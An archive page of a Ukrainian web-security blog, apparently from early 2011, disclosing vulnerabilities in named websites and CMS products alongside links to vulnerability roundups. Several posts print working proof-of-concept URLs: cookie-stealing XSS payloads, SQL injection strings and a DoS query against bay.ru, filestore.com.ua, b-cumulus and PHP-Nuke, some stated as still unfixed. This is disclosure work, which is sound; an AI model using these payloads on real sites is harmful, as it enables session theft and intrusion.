Архів для категорії 'Уразливості'

Уразливість в b-cumulus

23:55 17.01.2011

Раніше я вже писав про уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків. Така ж уразливість є і в b-cumulus (віджеті для Blogger, що також використовується на окремих сайтах), що використовує модифіковану версію tagcloud.swf розроблену автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Нещодавно, 15.01.2011, я знайшов Cross-Site Scripting уразливість в b-cumulus. Про що найближчим часом повідомлю розробнику.

XSS:

Використовуватися може файл tagcloud.swf або tagcloud-ru.swf.

http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії b-cumulus.

Уразливості на www.bay.ru

15:21 17.01.2011

28.05.2010

У жовтні, 24.10.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.bay.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на vch.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.01.2011

XSS:

http://www.bay.ru/search?query=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?min_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?max_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E

Insufficient Anti-automation:

В формі реєстрації (https://www.bay.ru/customer/signup, що зараз змінила адресу на https://www.bay.ru/account/register) немає захисту від автоматизованих запитів (капчі).

Якщо XSS уразливості вже виправлені, то IAA уразливість досі не виправлена.

Уразливості в MC Content Manager

15:10 15.01.2011

05.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting, Brute Force та Full path disclosure уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на сайті www.br-ua.com та інших сайтах на даному движку. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MC Content Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

15.01.2011

XSS:

http://site/cms/’;alert(document.cookie);/*

Brute Force:

http://site/admin/

Full path disclosure:

http://site/cms/1/

http://site/ru/cms/1

http://site/en/cms/1

Уразливі потенційно всі версії MC Content Manager (MC Content Manager v.10.1.1 та попередні версії).

Добірка уразливостей

15:20 14.01.2011

В даній добірці уразливості в веб додатках:

  • Lexmark Multiple Laser printer FTP Remote Denial of Services (деталі)
  • Lexmark Multiple Laser Printer Remote Stack Overflow (деталі)
  • XSS vulnerability in SantaFox search module (деталі)
  • XSRF (CSRF) in SantaFox (деталі)
  • HP Insight Control Server Migration for Windows, Remote Cross Site Scripting (XSS) (деталі)
  • Member Management System v 4.0 XSS vuln (деталі)
  • NetArtMEDIA Car Portal v2.0 XSS vuln (деталі)
  • SpringSource tc Server unauthenticated remote access to JMX interface (деталі)
  • PowerStore™ 3 XSS vuln (деталі)
  • HP Performance Manager, Remote Unauthorized Access, Cross Site Scripting (XSS), Denial of Service (DoS) (деталі)

Уразливість на depositfiles.com

15:26 13.01.2011

26.05.2010

У жовтні, 23.10.2009, я знайшов Insufficent Anti-automation уразливість на сайті http://depositfiles.com (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

13.01.2011

Insufficent Anti-automation:

http://depositfiles.com/ru/tickets/

В контактній формі можна було ввести будь-який код капчі (тобто капча не працювала).

Дана уразливість зараз вже виправлена (шляхом заміни власної капчі на reCaptcha).

Добірка уразливостей

15:10 12.01.2011

В даній добірці уразливості в веб додатках:

  • HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in AContent (деталі)
  • XSS vulnerability in AContent (деталі)
  • XSS vulnerability in ATutor (деталі)
  • VMware View 3.1.3 addresses an important cross-site scripting vulnerability (деталі)
  • XSS vulnerability in AChecker (деталі)
  • XSS (cross site scripting) vulnerability in Serendipity (деталі)
  • aria2 metalink “name” Directory Traversal Vulnerability (деталі)

XSS та IAA уразливості в PHP-Nuke

15:01 11.01.2011

28.10.2010

У березні, 21.03.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на одному сайті, а нещодавно перевірив їх на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.01.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0), використовуючи MouseOverJacking можна зробити версію для всіх браузерів.

Insufficient Anti-automation:

http://site/modules.php?name=Feedback

В формі немає захисту від автоматизованих запитів (капчі).

Уразливі PHP-Nuke 8.1 та попередні версії (перевірено в PHP-Nuke 8.0 та 8.1).

Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

Добірка уразливостей

18:21 10.01.2011

В даній добірці уразливості в веб додатках:

  • AlienTechnology ALR-9900 default root password and backdoor (деталі)
  • New phpmyadmin packages fix several vulnerabilities (деталі)
  • Vulnerabilities in OCS Inventory NG (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability (деталі)
  • Directory Traversal in Axigen v7.4.1 running on Windows (деталі)
  • XSS vulnerability in AContent search (деталі)
  • XSS vulnerability in Atutor edit content folder (деталі)

Уразливість на kpi-telecom.kpi.ua

15:01 08.01.2011

24.05.2010

У жовтні, 22.10.2009, я знайшов Cross-Site Scripting уразливість на сайті http://kpi-telecom.kpi.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.01.2011

XSS:

Дана уразливість досі не виправлена.

Нові уразливості на filestore.com.ua

19:19 07.01.2011

20.05.2010

У жовтні, 21.10.2009, а також додатково сьогодні, я знайшов Denial of Service, Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на проекті http://filestore.com.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на filestore.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.01.2011

DoS:

http://filestore.com.ua/search.php?search=%25%25%25&sort=downloadsdesc&type=filename

Full path disclosure:

http://filestore.com.ua/search.php?search=1&type=’

http://filestore.com.ua/search.php?search=1&sort=’

SQL Injection:

http://filestore.com.ua/search.php?search=1&sort=downloadsdesc&type='%20or%201='1
http://filestore.com.ua/search.php?search=1&sort='%20or%201='1&type=filename

XSS:

http://filestore.com.ua/search.php?search=1&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&type=filename
http://filestore.com.ua/search.php?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=downloadsdesc&type=filename
http://filestore.com.ua/login.php?act=getpass&user=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://filestore.com.ua/login.php?act=getpass&email=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені.